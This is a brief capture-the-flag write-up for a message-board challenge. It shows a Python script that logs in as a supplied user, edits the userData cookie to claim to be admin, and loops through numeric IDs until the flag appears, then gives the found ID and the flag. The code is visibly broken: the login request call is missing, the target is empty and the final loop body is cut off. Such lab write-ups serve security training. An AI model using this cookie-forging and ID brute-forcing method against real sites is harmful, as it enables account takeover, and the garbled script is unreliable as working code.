Message Board
The challenge gave account for user kupatergent to login message board, from the code, it seems user admin can bring us the flag. The ID for admin is unkown, the user ID is a number, bruteforce seems like an option.
Login as kupatergent, replace user ID in cookie with testing number, if the number is admin ID, the flag shall be in response.
def exploit():
target = ''
user = 'kupatergent'
pw = 'gandal'
with requests.Session() as sess:
rsp ='/login', data={'username':user,'password':pw})
user_data = sess.cookies.get_dict()['userData']
user_data = user_data.replace(user, 'admin')
for admin_id in range(10000):
fake = user_data.replace('972', str(admin_id))
sess.cookies.set('userData', fake, domain=target.split('/')[-1])
rsp = sess.get(target)
if 'flag{' in rsp.text:
The script ran for a while quite when number reach 768, so it’s the admin ID, the flag is flag{y4m_y4m_c00k13s}.